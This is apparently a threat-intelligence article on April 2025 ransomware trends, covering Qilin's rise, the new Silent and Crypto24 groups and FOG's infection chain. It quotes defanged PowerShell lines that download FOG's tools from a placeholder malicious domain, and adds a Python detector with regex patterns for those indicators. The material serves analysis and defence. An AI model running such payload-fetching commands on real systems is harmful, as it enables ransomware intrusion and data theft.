
April 2025 witnessed a notable shift in the global ransomware landscape, with 470 reported victims worldwide representing a significant 29% decrease from March.
Despite this numerical decline, ransomware operations continue to demonstrate increased sophistication and strategic targeting, indicating that threat actors are becoming more selective rather than less active.
The manufacturing sector bore the brunt of these attacks, followed closely by the information technology industry, with the United States remaining the primary geographical target for cybercriminals.

Qilin has firmly established itself as the dominant ransomware group in this evolving landscape, recording a remarkable 71.4% increase in activity compared to the previous month.

With 72 confirmed victims, Qilin’s rapid ascension signals a worrying trend of accelerated capabilities and expanding infrastructure.
Other established groups showing significant growth include Play with a 75.9% activity increase and DragonForce with a more moderate 25% growth, illustrating the dynamic nature of the current threat environment.
Cyfirma researchers identified several emerging ransomware groups making their debut on the threat landscape during April 2025.
Most notable among these new entrants are Silent and Crypto24, which have quickly established their presence with distinctive operational approaches.
The sudden emergence of these groups coincides with the unexpected shutdown of RansomHub, suggesting a possible redistribution of technical talent and resources across the ransomware ecosystem.

The Silent ransomware group, which launched its leak site in late April, has distinguished itself with a unique operational methodology.
Unlike traditional ransomware operators that focus primarily on encryption, Silent claims to prioritize data theft, targeting confidential corporate information that can be sold to competitors or on dark web marketplaces.
With four confirmed victims already, the group emphasizes discretion and anonymity: it encrypts as little data as possible to lower the chance of detection while maximizing its leverage through the stolen information.
Meanwhile, Crypto24 has established itself with greater aggression, claiming eight victims worldwide since its emergence.
This group appears to be taking advantage of the vacuum left by RansomHub’s departure, potentially absorbing former affiliates seeking new operational platforms.
FOG Ransomware’s Sophisticated Infection Chain
The technical sophistication of current ransomware is exemplified by FOG, which utilizes a multi-stage infection process that begins with phishing emails containing a ZIP archive named “Pay Adjustment.zip.”
This archive contains a malicious LNK file that executes a PowerShell script (“stage1.ps1”) responsible for downloading additional components:
# stage1.ps1, as described in the report: fetches the follow-on components into the user's %TEMP% directory.
# URLs are defanged (hxxp, [.]) and the domain is a placeholder.
Invoke-WebRequest -Uri "hxxp://malicious-domain[.]com/cwiper.exe" -OutFile "$env:TEMP\cwiper.exe"
Invoke-WebRequest -Uri "hxxp://malicious-domain[.]com/ktool.exe" -OutFile "$env:TEMP\ktool.exe"          # privilege-escalation tool (see below)
Invoke-WebRequest -Uri "hxxp://malicious-domain[.]com/lootsubmit.ps1" -OutFile "$env:TEMP\lootsubmit.ps1"
The infection chain includes a privilege escalation tool (ktool.exe) that exploits a vulnerability in the iQVW64.sys driver, and data-harvesting scripts that collect system details and geolocation data.
Before running its payload, the ransomware checks for virtualization so that it can avoid the sandbox environments commonly used for malware analysis.
Upon encryption, files receive the “.flocked” extension, and a ransom note (readme.txt) containing politically themed messaging is dropped.
Unusually, victims are instructed to further propagate the malware, a social engineering tactic that differentiates FOG from more traditional ransomware operations.
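The stages above (lure archive, stage1.ps1, downloads into %TEMP%, the iQVW64.sys driver load, the .flocked rename and readme.txt) are exactly the observables a SOC would key on. The following is an added example, not code from the Cyfirma report or from FOG itself: a small correlator that parses simplified, constructed host telemetry (the key=value layout, event names and hosts are assumptions for illustration) and raises a per-host verdict only when several stages line up, so that a generic readme.txt on its own does not page anyone.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (NOT real logs): simplified key=value records
# loosely resembling Sysmon / PowerShell script-block events. Field and event
# names are assumptions made for this example.
SAMPLE_LOGS = r"""
host=WS01 event=FileCreate image=C:\Windows\explorer.exe target="C:\Users\jdoe\Downloads\Pay Adjustment.zip"
host=WS01 event=ProcessCreate image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -ep bypass -f C:\Users\jdoe\AppData\Local\Temp\stage1.ps1"
host=WS01 event=ScriptBlock text="Invoke-WebRequest -Uri hxxp://malicious-domain[.]com/ktool.exe -OutFile $env:TEMP\ktool.exe"
host=WS01 event=DriverLoad image=C:\Users\jdoe\AppData\Local\Temp\iQVW64.sys
host=WS01 event=FileRename target=C:\Users\jdoe\Documents\q1.xlsx.flocked
host=WS01 event=FileCreate target=C:\Users\jdoe\Documents\readme.txt
host=WS02 event=ProcessCreate image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe Get-Process"
host=WS02 event=FileCreate target=C:\Users\bob\Desktop\readme.txt
"""

# key=value or key="value with spaces"
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_line(line):
    """Turn one key=value record into a dict; unquoted values end at whitespace."""
    return {k: (q or u) for k, q, u in FIELD_RE.findall(line)}

# (stage, required event type, field to inspect, indicator pattern).
# Indicators are the ones named in the article for FOG's chain.
STAGES = [
    ("lure_archive",  "FileCreate",    "target", re.compile(r"Pay Adjustment\.zip$", re.I)),
    ("stage1_script", "ProcessCreate", "cmd",    re.compile(r"powershell.*stage1\.ps1", re.I)),
    ("temp_download", "ScriptBlock",   "text",   re.compile(r"Invoke-WebRequest.*-OutFile\s+(\$env:TEMP|.*\\Temp\\)", re.I)),
    ("driver_load",   "DriverLoad",    "image",  re.compile(r"\\iQVW64\.sys$", re.I)),
    ("encryption",    "FileRename",    "target", re.compile(r"\.flocked$", re.I)),
    ("ransom_note",   "FileCreate",    "target", re.compile(r"\\readme\.txt$", re.I)),
]
DELIVERY_STAGES = {"lure_archive", "stage1_script", "temp_download", "driver_load"}

def match_stages(record):
    """Return the set of FOG stages one parsed record matches."""
    hits = set()
    for stage, event, field, pattern in STAGES:
        if record.get("event") == event and pattern.search(record.get(field, "")):
            hits.add(stage)
    return hits

def correlate(log_text):
    """Group stage hits per host and return {host: (verdict, sorted stages)}."""
    per_host = defaultdict(set)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            per_host[rec.get("host", "?")] |= match_stages(rec)
    verdicts = {}
    for host, stages in per_host.items():
        if "encryption" in stages:
            verdict = "fog_ransomware_active"          # .flocked renames: already encrypting
        elif len(stages & DELIVERY_STAGES) >= 2:
            verdict = "fog_delivery_in_progress"       # chain observed before the encryptor ran
        else:
            verdict = "no_fog_indicators"              # readme.txt alone is far too generic
        verdicts[host] = (verdict, sorted(stages))
    return verdicts

if __name__ == "__main__":
    for host, (verdict, stages) in correlate(SAMPLE_LOGS).items():
        print(f"{host}: {verdict} {stages}")
```

In practice the `temp_download` and `driver_load` rules are the ones worth tuning first: downloads into %TEMP% by an LNK-spawned PowerShell and a user-writable driver being loaded are both high-signal long before any file is renamed.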
With ransomware groups continuously evolving their tactics and techniques, organizations must remain vigilant and implement comprehensive security measures to protect against these sophisticated threats that show no signs of abating in 2025.